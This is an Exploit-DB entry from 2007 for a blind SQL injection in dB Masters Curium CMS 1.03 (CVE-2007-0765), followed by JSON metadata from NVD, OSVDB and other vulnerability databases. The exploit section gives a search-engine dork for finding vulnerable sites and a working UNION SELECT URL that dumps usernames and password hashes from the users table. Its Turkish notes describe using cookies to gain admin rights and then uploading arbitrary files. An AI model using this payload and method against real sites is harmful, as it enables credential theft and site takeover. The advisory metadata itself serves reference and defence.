ID EDB-ID:3256
Type exploitdb
Reporter ajann
Modified 2007-02-02T00:00:00
Description
dB Masters Curium CMS <= 1.03 (c_id) Remote SQL Injection Vulnerability. CVE-2007-0765. Webapps exploit for php platform
*******************************************************************************
# Title : dB Masters' Curium CMS <= 1.03(c_id) Remote Blind SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.dbmasters.net
# $$ : Free
# Dork : Powered by dB Masters' Curium CMS 1
# DorkEx : http://www.google.com.tr/search?q=Powered+by+dB+Masters%27+Curium+CMS+1&hl=tr&start=0&sa=N
# Info : \*Ele gecirdiginiz hash ve kullanici adi ile once siteye register
olarak cookie ile oynayarak admin yetkisiyle login olabilirsiniz
Upload bolumunden rahatlikla istediginiz uzantida dosyayi upload
edebilirsiniz.Uye olurken bazilarinda maile aktivasyon gelir.
#Lamerlere: \*Bir siteye rapor yollamakla o konuda cok bilgili olduumuz anla-
mina gelmez.Ben sahsen hicbirsey bilmedigim kanisindeyken goru-
yorumki bircok insan hakikaten birseyi basardigini saniyor.
Bunada burada deginmek istedim.
Birakin sizi baskasi ovsun.
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//news.php?id=-1&c_id=[SQL]
Example:
//news.php?id=-1&s_id=-1%20union%20select%200,1,concat(username,char(32),password),3,4,5,6,7,8,9,0%20from%20cm_users/*
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-02-02]
{"hash": "4fb407ae3d3e0bb516200ae9776439e21b510797f42e745fa01566820345b261", "id": "EDB-ID:3256", "lastseen": "2016-01-31T18:04:20", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/3256/", "description": "dB Masters Curium CMS <= 1.03 (c_id) Remote SQL Injection Vulnerability. CVE-2007-0765. Webapps exploit for php platform", "title": "dB Masters Curium CMS <= 1.03 c_id Remote SQL Injection Vulnerability", "sourceData": "*******************************************************************************\n# Title : dB Masters' Curium CMS <= 1.03(c_id) Remote Blind SQL Injection Vulnerability\n# Author : ajann\n# Contact : :(\n# S.Page : http://www.dbmasters.net\n# $$ : Free\n# Dork : Powered by dB Masters' Curium CMS 1\n# DorkEx : http://www.google.com.tr/search?q=Powered+by+dB+Masters%27+Curium+CMS+1&hl=tr&start=0&sa=N\n\n# Info : \\*Ele gecirdiginiz hash ve kullanici adi ile once siteye register\n olarak cookie ile oynayarak admin yetkisiyle login olabilirsiniz\n Upload bolumunden rahatlikla istediginiz uzantida dosyayi upload\n edebilirsiniz.Uye olurken bazilarinda maile aktivasyon gelir. \n\n#Lamerlere: \\*Bir siteye rapor yollamakla o konuda cok bilgili olduumuz anla-\n mina gelmez.Ben sahsen hicbirsey bilmedigim kanisindeyken goru-\n yorumki bircok insan hakikaten birseyi basardigini saniyor.\n Bunada burada deginmek istedim.\n Birakin sizi baskasi ovsun.\n\n*******************************************************************************\n\n[[SQL]]]---------------------------------------------------------\n\nhttp://[target]/[path]//news.php?id=-1&c_id=[SQL]\n\nExample:\n\n//news.php?id=-1&s_id=-1%20union%20select%200,1,concat(username,char(32),password),3,4,5,6,7,8,9,0%20from%20cm_users/*\n\n[[/SQL]]\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# ajann,Turkey\n# ...\n\n# Im not Hacker!\n\n# milw0rm.com [2007-02-02]\n", "objectVersion": "1.0", "cvelist": ["CVE-2007-0765"], "published": "2007-02-02T00:00:00", "osvdbidlist": ["33111"], "references": [], "reporter": "ajann", "modified": "2007-02-02T00:00:00", "href": "https://www.exploit-db.com/exploits/3256/"}
{"cve": [{"lastseen": "2017-10-19T11:12:44", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/32148", "http://www.vupen.com/english/advisories/2007/0474", "https://www.exploit-db.com/exploits/3256", "http://www.securityfocus.com/bid/22373"], "description": "SQL injection vulnerability in news.php in dB Masters Curium CMS 1.03 and earlier allows remote attackers to execute arbitrary SQL commands via the c_id parameter.", "edition": 3, "reporter": "NVD", "published": "2007-02-05T21:28:00", "title": "CVE-2007-0765", "type": "cve", "enchantments": {"score": {"modified": "2017-10-19T11:12:44", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-0765"], "scanner": [], "modified": "2017-10-18T21:30:04", "cpe": ["cpe:/a:db_masters_multimedia:curium_cms:1.03"], "id": "CVE-2007-0765", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0765", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:29", "references": [], "description": "## Manual Testing Notes\n/news.php?id=-1&s_id=-1%20union%20select%200,1,concat(username,char(32),password),3,4,5,6,7,8,9,0%20from%20cm_users/*\n## References:\nVendor URL: http://www.dbmasters.net/\n[Secunia Advisory ID:24032](https://secuniaresearch.flexerasoftware.com/advisories/24032/)\nOther Advisory URL: http://milw0rm.com/exploits/3256\nISS X-Force ID: 32148\nFrSIRT Advisory: ADV-2007-0474\n[CVE-2007-0765](https://vulners.com/cve/CVE-2007-0765)\nBugtraq ID: 22373\n", "edition": 1, "reporter": "OSVDB", "published": "2007-02-02T09:03:45", "title": "dB Masters Curium CMS news.php c_id Variable SQL Injection", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-0765"], "modified": "2007-02-02T09:03:45", "href": "https://vulners.com/osvdb/OSVDB:33111", "id": "OSVDB:33111", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "references": ["https://vulners.com/securityvulns/securityvulns:doc:15959", "https://vulners.com/securityvulns/securityvulns:doc:15956", "https://vulners.com/securityvulns/securityvulns:doc:15958", "https://vulners.com/securityvulns/securityvulns:doc:15960", "https://vulners.com/securityvulns/securityvulns:doc:15957"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "reporter": " ", "published": "2007-02-03T00:00:00", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:23", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "KGB", "version": "1.9", "operator": "eq"}, {"name": "Flipper Poll", "version": "1.1", "operator": "eq"}, {"name": "phpBB ezBoard converter", "version": "0.2", "operator": "eq"}, {"name": "eqDKP", "version": "1.3", "operator": "eq"}, {"name": "Photo Galerie Standard", "version": "1.1", "operator": "eq"}, {"name": "F3Site", "version": "2.1", "operator": "eq"}], "cvelist": ["CVE-2007-0757", "CVE-2007-0337", "CVE-2007-0761", "CVE-2007-0762", "CVE-2007-0765", "CVE-2007-0764", "CVE-2007-0763", "CVE-2007-0760"], "modified": "2007-02-03T00:00:00", "id": "SECURITYVULNS:VULN:7161", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7161", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
